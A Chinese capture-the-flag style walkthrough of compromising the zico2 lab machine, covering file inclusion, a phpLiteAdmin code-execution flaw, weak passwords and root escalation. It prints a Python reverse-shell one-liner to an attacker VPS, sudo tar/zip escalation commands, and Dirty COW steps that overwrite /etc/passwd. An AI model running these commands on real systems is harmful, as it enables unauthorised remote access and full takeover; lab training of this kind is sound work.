试验环境
靶机:zico2
攻击机:kali win10 vps
试验过程
使用arp-scan工具扫描内网存活主机,发现目标机器ip为172.20.10.8,使用nmap扫描其开放的端口有22、80和111端口
访问80端口的web服务,发现站点是php语言写的,发现有个页面在?page=tools.html
这里测试存在文件包含漏洞
使用dirsearch扫一手目录,发现存在一个dbadmin目录,访问一下看看
发现是phpLiteAdmin登录界面,版本为1.9.3,试了一下发现存在弱口令为admin
百度了一下phpLiteAdmin爆出过的历史漏洞,发现版本<=1.9.3存在代码执行漏洞,其利用方法就是创建一个.php的数据库,然后在该数据库表中插入一句话木马。
使用弱口令登录进去后,在这里发现了两个数据库账号密码,经解密为root--34kroot34和zico--zico2215@
利用思路1:直接使用ssh登录(失败了)
使用hydra进行验证,发现不行
利用思路2:利用代码执行写入一句话木马,文件包含进行漏洞利用
创建一个chan.php数据库,然后创建一个aaa表,插入一句话(这里插入$_POST也可以,但是我试了菜刀和冰蝎,可以连接上但多少都有点问题)
利用文件包含来执行命令
利用python反弹命令:
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('xx.xx.xx.xx',1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"这里我使用了自己的vps来接收,然后使用python获取一个交互式shell
提权方法(sudo 提权)1:
查看/home/zico目录下的to_do.txt文件,提示查看目录joomla、bootstrsp和wordpress,在wordpres目录下的配置文件找到了zico的密码
切换到zico用户,使用sudo -l命令查看用户配置权限,发现可以无密码使用tar和zip命令
使用tar命令进行提权
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
使用zip命令进行提权
touch chansudo zip chan.zip chan -T --unzip-command="sh -c /bin/bash"
(linux命令提权辅助查询询:https://gtfobins.github.io/)提权方法2(脏牛提权):
将dirty.c文件放在vps的web服务下,在靶机上试验wget命令下载下来,
使用命令
gcc -pthread dirty.c -o dirty -lcrypt 进行编译
执行./dirty 密码即可提权成功
查看/etc/passwd文件,发现root用户被修改成了firefart用户,密码为chan
切换到fierfart用户,提权成功。
本文始发于微信公众号(暗魂攻防实验室):【web安全】zico2靶机渗透
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论